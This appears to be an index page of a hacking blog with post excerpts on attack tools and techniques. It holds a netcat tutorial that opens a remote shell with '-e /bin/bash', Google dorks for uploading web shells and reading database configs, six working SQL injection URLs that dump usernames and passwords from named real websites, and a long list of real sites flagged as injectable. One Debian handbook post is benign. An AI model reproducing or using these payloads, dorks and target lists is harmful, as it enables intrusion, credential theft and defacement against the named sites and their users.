
CodeXploiter 1.0 - Finding vulnerabilities in PHP files

CodeXploiter is a white-box scanner for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result, security professionals can focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.

  • Detects common vulnerabilities such as:
    • SQL Injection
    • Cross Site Scripting (XSS)
    • Remote/Local File Inclusion
    • PHP Code Execution
    • Command Execution
    • File Access
    • File Upload
  • Searches for vulnerabilities in user-defined functions
  • Customizable scan options
  • Vulnerabilities are grouped based on file names and vulnerability type
  • Scan single or multiple files
  • Fast scanner
  • Easy to use and user-friendly Graphical User Interface (GUI)

Download Details:
  • Version: 1.0
  • Size: 3.71 MB
  • System Requirements: Microsoft Windows 8, Microsoft Windows 7, Windows Vista, or Windows XP

Read More

 

[Tutorial]Backconnect with netcat

1. Download

netcat for Windows: http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with the shell: http://www.multiupload.nl/TOBD6TAOXE

2. Upload nc with the shell

3. Set chmod 777 on nc

4. Run the command ./nc -vv -l -p [port] -e /bin/bash in the shell

5. Open cmd, change to the directory where nc is saved, e.g. cd c:\
and run this command:
nc -vv [ip target] [port]

6. Now you have a back connect

Read More

 

WebShell remote configuration execution

webShell 4.0 remote configuration execution
Dorks: ext:php intitle:webSPELL v4.0
       "inurl:/picture.php?file="
Find a vulnerable website and go to http://website.com/picture.php?file=_mysql.php
You'll get a blank page.
Press Ctrl+U and view the source.
You'll find something like this:
Now connect to the database and do whatever you want.
Live demo :

Read More

 

CK Hash Cracker

CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here

__Change Log__
Hash identifier modified
Online database checker bug fixed and works faster
Offline database search engine modified
Rainbow table algorithm added

How to add an additional database release?

After installation with the default settings, a folder named CK_Hash_Cracker Version 3.0 will be created in Root Directory/Program Files, which is mostly the C: drive, so the path will be C:\Program Files\CK_Hash_Cracker-Version 3.0. Under this folder there are two folders named "Brute" and "DatabaseConnector".

Files under the "Brute" folder are used for brute-forcing. If you place an additional wordlist, make sure it contains no duplicate words; otherwise it will just increase the running time. You can place files with any name under this folder and it will work fine, as long as the files are in a readable format.

Files under "DatabaseConnector" are the offline database, so for any database release, after downloading the databases, put the files under the "DatabaseConnector" folder and that's it: the tool will automatically upgrade the database.

It has a self-installer, so to install, just run the setup file. To uninstall, you can remove it from Control Panel or with the self-uninstaller.

If you get an error at run-time, you probably do not have the Microsoft Visual C++ 2008 run-time installed. The application doesn't need Python to run, but it needs the run-time components. You can get the download packages from here:

For Windows 32 bit: Click Here

For Windows 64 bit: Click Here

And then try running the application.
CK_Hash_Cracker (Version 3.0) Download Link: Click Here

Read More

 

"Testing Image collection" shell and files upload vulnrablity

Dorks: inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
       intitle:"Testing Image Collections"

Go to Google or Bing and type the dork inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
Now look at the search results in Google or Bing.
Select any site from the search results and look for an upload option.

Now select your shell or deface page and upload it.

To view your uploaded shell or deface page, go to:
http://website.com/files/yourfilehere or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0 

Read More

 

Exidous CMD Shell

[Image: Connect to shell]

[Image: Connected]

[Image: XSA Tool]

[Image: Getting Username]

[Image: Going to that directory]

[Image: Dir Listing]

[Image: Just For Fun (/etc/passwd)]

Download


Read More

 

Smart Hunter v.1.4.3 Public Version


Download : http://adf.ly/FRrSF


Read More

 

6 Random Injections

1/
Code:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, ​0x3b,password),5,6,7,8,9,10 from users_tbl--

2/

Code:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 ​9,20,21,22,23 from user_table--

3/

Code:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Code:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, ​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Code:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Code:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

Read More

 

Projects CEH 95MB

Read More

 

The Debian Administrator’s Handbook

[Image: debian-liberation-cover.jpg]


The BackTrack Team is proud to have contributed 1000 EUR to the Debian Administrator’s Handbook liberation fund. This book, written by two Debian developers, is a welcome addition to any administrator’s bookshelf. Debian is very popular on servers and it’s also the base distribution from which BackTrack is forged.
Security is not neglected in this book, since a full chapter is dedicated to the topic. It covers setting up a firewall, monitoring, intrusion detection systems, setting up SELinux policies, dealing with a compromised machine, and gives much thoughtful advice on defining a security policy within your organization.


The authors have pledged to release the book under an open source license if the associated “liberation fund” reaches 25,000 EUR. Today, there’s less than 3,000 EUR left to raise, and we invite you to contribute as well. By giving 10 EUR or more, you’ll get a copy of the ebook as soon as it’s available (even if the liberation fund is not completed). Click here to contribute now.


The book is planned to be released in April, but in the meantime you can have a peek at a sample chapter and the full table of contents. We have no doubt that this book will provide a solid foundation to all those looking to better understand Debian, BackTrack and Linux at large.
Source: backtrack-linux.org

EBOOK DOWNLOAD LINK

Quote: http://debian-handbook.info/get/now/

http://www.fshare.vn/file/T059CNM8ST/

Read More

 

- Sites with SQL errors

Found : http://www.falconhead.com/products.php?id='11
Found : http://www.solobambini.com/products.php?products_line_id='1
Found : http://www.crispi.it/it/products.php?id_menu='2
Found : http://www.jrmerritt.com/products.php?page_id='135
Found : http://www.downhilldragonclan.com/products.php?id='42
Found : http://www.tekaillumination.com/products.php?ID='92
Found : http://www.med-int.com/products.php?id='13
Found : http://www.actmachines.com/cart/products.php?id='87
Found : http://www.mtiadventurewear.com/products.php?id='40
Found : http://www.stringease.com/products.php?cat='snaps&id='fastach_clips
Found : http://www.tonyjeary.com/products.php?cat_id='2
Found : http://www.bmfwallets.com/products.php?id='6
Found : http://www.flexiblewhips.com/products.php?id='10
Found : http://www.pepperball.com/products.php?category_id='51
Found : http://www.duckhuntingwaders.com/products.php?ID='552
Found : http://www.matrixinnovations.co.uk/products.php?id='1
Found : http://www.stormtec.ca/products.php?id='4
Found : http://www.stormtec.ca/products.php?id='11
Found : http://wayet-lighting.com/products.php?id='2
Found : http://wayet-lighting.com/products.php?id='2
Found : http://remsoft.com/products.php?id='1
Found : http://www.esoterikaudio.com.au/products.php?product_id='31
Found : http://www.gsboxing.com/products.php?iD='70-0-0-0
Found : http://www.everyway-medical.com/products.php?id='35
Found : http://www.midwestfolding.com/products.php?prodline_id='11&product_id='307
Found : http://www.advantagecontrols.com/products.php?category_id='3&products_id='7
Found : http://www.crispi.it/it/products.php?id_menu='1
Found : http://www.dxgeneration.com/products.php?details-id='30
Found : http://www.stormtec.ca/products.php?id='3
Found : http://www.najarianfurniture.com/products.php?id='40
Found : http://www.rajagro.com/products.php?cat_id='8
Found : http://www.antiques-oronoco.com/products.php?id='176
Found : http://www.hughes-and-kettner.com/products.php5?mode='prod&id='115
Found : http://sivaana.com/products.php?cat_id='1&page='0
Found :
http://www.phidgets.com/products.php?category='13%26product_id='1062"target='"_blank
http://www.rideitmoto.com/products.php?id='16"target='"_blank
http://www.cheekyherbs.com/products.php?id='8"target='"_blank
http://www.simiotica.com/products.php?id='12"target='"_blank
http://www.musicalsounds.us/products.php?id='MOSSCADE"target='"_blank
http://www.shopbabybliss.com/products.php?id='53"target='"_blank
http://proforceequipment.com/products.php?id='25"target='"_blank
http://www.aor.ca/html/products.php?id='14"target='"_blank
http://www.jsr-productions.com/products.php?id='16"target='"_blank
http://www.thebellydanceshop.com/products.php?id='22"target='"_blank
Found :
http://www.drnorthrup.com/bookstore/northrup_products.php?product_id='238"target='"_blank
http://www.unitedforms.com/products/products.php?id='3%26product_id='2"target='"_blank
http://www.thintuition.com/products.php?category_id='103"target='"_blank
http://www.cubancrafters.com/products/DESKTOP-HUMIDORS-BY-CUBAN-CRAFTERS-%25252d-100-CIGAR-BARGAIN-HUMIDOR-FEATURES-GLOSS-ROSEWOOD-WITH-SPANISH-CEDAR-INTERIOR.html"target='"_blank
http://www.mdhelicopters.com/products.php?id='MD_600N"target='"_blank
http://www.tonartllc.com/products.php?id='floating-buddha"target='"_blank
http://metalkraft.com/products.php?id='6"target='"_blank
Found :
http://www.gs-sport.com/products.php?en_product_id='2"target='"_blank
http://www.thermalright.com/products/index.php?cat_id='27"target='"_blank
http://www.sanyohvac.com/products.php?id='12KHS71"target='"_blank
http://www.pistolgear.com/products.php?id='46"target='"_blank
http://www.akiles.com/products.php?category_id='13%26product_id='1080"target='"_blank
http://www.icandyuk.com/products.php?id='cherry"target='"_blank
http://www.brookfieldpoultryequipment.com/products.php?id='50"target='"_blank
http://www.flightdecksolutions.com/list_products.php?id='22"target='"_blank
http://www.eurocomponentsusa.com/frame_%26_suspension/products.php?id='0504"target='"_blank
http://www.protofab4x4.com/products.php?ID='05"target='"_blank
http://www.avalonprod.com/products.php?prod_id='40"target='"_blank
http://www.riderstation.com/catalog/products.php?id='35"target='"_blank
http://www.eotech-inc.com/products.php?id='3"target='"_blank
http://www.unitedforms.com/products/products.php?id='1%26product_id='1"target='"_blank
http://www.therealseedcompany.com/products.php?product_id='12"target='"_blank
http://plywood.boatbuildercentral.com/products.php?id='3"target='"_blank
http://www.louroe.com/products.php?id='55"target='"_blank
http://www.fabricut.com/products.php?id='3"target='"_blank
http://www.hubbardbreeders.com/products.php?id='11"target='"_blank
http://www.filzer.com/products.php?cat_id='1"target='"_blank
http://www.alphaplugins.com/products/products.php?menu='get_prod_id%26prod_id='2"target='"_blank
http://www.911medicalid.com/products.php"target='"_blank
Found :
http://www.thebellydanceshop.com/products.php?id='5"target='"_blank
http://dualsportarmory.com/products.php?category_id='141"target='"_blank
http://plantoys.com/products.php?cat_id='2%26show_all='true"target='"_blank
http://www.hubbardbreeders.com/products.php?id='5"target='"_blank
http://www.beesto.com/index.php/extensions?id='6"target='"_blank
http://www.usstove.com/index.php?route='cms/article%26path='2%26article_id='2"target='"_blank
http://www.aorhealth.com/html/products.php?id='194"target='"_blank
http://www.crownhill.ca/investment_products.php?id='30"target='"_blank
http://www.buggyworld.com/parts/products.php?id='4"target='"_blank
http://www.autokeys.us/products.php?category_id='57"target='"_blank
http://www.autokeys.us/products.php?category_id='72"target='"_blank
http://www.reefindustries.com/products.php?id='23"target='"_blank
http://www.davescyclesupply.com/products.php?category_id='187"target='"_blank
Found : http://www.xtracpads.com/products.php?prod_id='27%26section='1"target='"_blank
http://www.martelcorp.com/?cat='114%26action='detail%26id='73"target='"_blank
Found :
http://www.fondriestbici.com/eng/products.php?cat='2%26id='19"target='"_blank
http://www.vecco.com/products.php?sub_cat_id='24"target='"_blank
http://muvipix.com/products.php?subcat_id='44"target='"_blank
http://www.filzer.com/products.php?id='102"target='"_blank
http://www.filzer.com/products.php?id='102"target='"_blank
http://www.syndicatelofts.com/shop/"target='"_blank
http://www.biobrite.com/products.php?category_id='1"target='"_blank
http://www.wateccameras.com/products.php?prod_id='187"target='"_blank
http://www.rollrite.com/products.php?c_id='17"target='"_blank
http://www.avalonprod.com/products.php?prod_id='9"target='"_blank
http://www.akiles.com/products.php?%26product_id='1025"target='"_blank
http://www.tntfireworks.com/products.php?id='SS%26pg='5"target='"_blank
http://www.mutazu.com/products.php?cat_id='1%26menu='DMY%2520Trunk%2520Series%26product_id='16%26s='prod.php"target='"_blank
http://www.emp-centauri.cz/products.php?id_kateg='5%26id_pkateg='20%26id='82"target='"_blank
http://www.ortega.com/products/products.php?id='7"target='"_blank
http://www.drainageonline.co.uk/products.php?category_id='18"target='"_blank
http://www.telit.com/en/products.php?p_id='3%26p_ac='show%26p='7"target='"_blank
http://lgnrevolution.com/products.php?id='NULL"target='"_blank
Found :
http://greenball.com/products.php?products_id='1"target='"_blank
http://www.rafaay.com/products.php?category_id='105"target='"_blank
Found :
http://www.muskyshop.com/modules/cart/products.php/nav_id/5/page/2/id/2321/name/StringeaseFastachMultiUseClip"target='"_blank
http://www.gs-sport.com/products.php?en_product_id='1"target='"_blank
Found :
http://www.birdladder.com/products.php?id='415%26path='459"target='"_blank
Found :
http://www.bishopstontrading.co.uk/shop/products.php?category_id='28"target='"_blank
http://www.musicalsounds.us/products.php?id='AcousticSolid"target='"_blank
http://www.codecorp.com/products.php?id='9"target='"_blank
http://www.tridentseafoods.com/retail/products.php?id='313"target='"_blank
Found :
http://www.firgelli.com/products.php?id='40"target='"_blank
http://www.tridentseafoods.com/retail/products.php?id='564"target='"_blank
http://www.mtqes.com.au/products.php?action='vehicle%26id='13"target='"_blank
http://greenball.com/products.php?products_id='9739"target='"_blank
Found : http://www.powermate.com/generators/products.php?cat_id='3%26s_id='25"target='"_blank
http://www.sargentlock.com/products/products.php?item_id='14"target='"_blank
http://expedition-timepiece.com/products.php?ID='38%26action='detail"target='"_blank
Found :
http://www.luckypet.com/products.php?cat='198"target='"_blank
Found :
http://www.bklighting.com/products.php?ID='319"target='"_blank
http://www.protofab4x4.com/products.php?ID='00%26ID2='48"target='"_blank
http://www.stullfeeders.com/products.php?id='139"target='"_blank
Found :
http://www.fullcirclehome.com/products.php?id='49%26prod_num='16"target='"_blank
http://www.bliby.net/products.php?id_page='8"target='"_blank
http://www.knaack.com/jobsite_storage_equipment/view_products.php?p_id='4"target='"_blank
Found :
http://www.viz.com/series"target='"_blank
http://spraywayblack.com/products.php?id='SP-295"target='"_blank
http://www.viz.com/product"target='"_blank
http://www.choretimepoultry.com/products.php?product_id='9"target='"_blank
http://cootacraft.com/products.php?prod_id='6"target='"_blank
http://www.elinchrom.com/products.php?p_id='216"target='"_blank
https://www.bavariasausage.com/shop/products.php?product_id='273%26storecategory_id='54"target='"_blank
Found :
http://sportcount.com/products.php?category_id='1"target='"_blank
http://www.deconlabs.com/products.php?ID='1"target='"_blank
http://www.rescuenorthwest.com/products.php?id='12"target='"_blank
http://www.alsacorp.eu/products.php?cat_id='1"target='"_blank
http://www.suitsyouswimwear.com/products.php?id='12"target='"_blank
http://downtown20.net/products.php?cat_id='2"target='"_blank
http://www.pistolgear.com/products.php?id='59"target='"_blank
http://downtown20.net/products.php?cat_id='2"target='"_blank
http://www.pistolgear.com/products.php?id='59"target='"_blank
http://www.giftsintl-us.com/products.php?cat='2"target='"_blank
http://www.budgetgroup.net/products.php?id_product_categ='77"target='"_blank
http://www.chefs-eg.com/products.php?id='mini"target='"_blank
http://www.kalopedis.com/products.php?ID='55"target='"_blank
http://allnaturalcosmetics.com/products.php?view='subcategories%26cat_id='4"target='"_blank
http://www.shakerhood.com/products.php?id='HemiParts"target='"_blank
http://coastalstudio.com/products.php?id='76"target='"_blank
http://www.imate.com/"target='"_blank
http://coastalstudio.com/products.php?id='76"target='"_blank
http://www.imate.com/"target='"_blank
Found :
Found : http://www.hughes-and-kettner.com/products.php5?mode='prod%26id='110"target='"_blank
Found :
http://www.equipro-bty.com/pages/products.php?id='1"target='"_blank
https://www.bavariasausage.com/shop/products.php?product_id='2417%26storecategory_id='29%26storesubcategory_id='6"target='"_blank
http://www.innerrange.com/products.php?id='54"target='"_blank
Found :
Found :
Found : http://www.hughes-and-kettner.com/products.php5?mode='prod%26id='11"target='"_blank
Found :
http://www.kannoa.com/products.php?type='category%26id='52"target='"_blank
http://www.thegadgetshop.co.za/products.php?prod_sec_id='372"target='"_blank
Found :
http://www.mustad.no/catalog/emea/products.php?id='43"target='"_blank
http://www.powerflowsystems.com/products.php?cat_id='11%26pid='13"target='"_blank
http://www.mustad.no/catalog/emea/products.php?id='43"target='"_blank
http://sheltersofamerica.com/products.php?id='1"target='"_blank
http://www.veroint.com/products.php?page_id='1"target='"_blank
http://idqusa.com/products.php?cat='13"target='"_blank
Found : http://www.xtracpads.com/products.php?prod_id='5%26section='1"target='"_blank
 

Read More

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương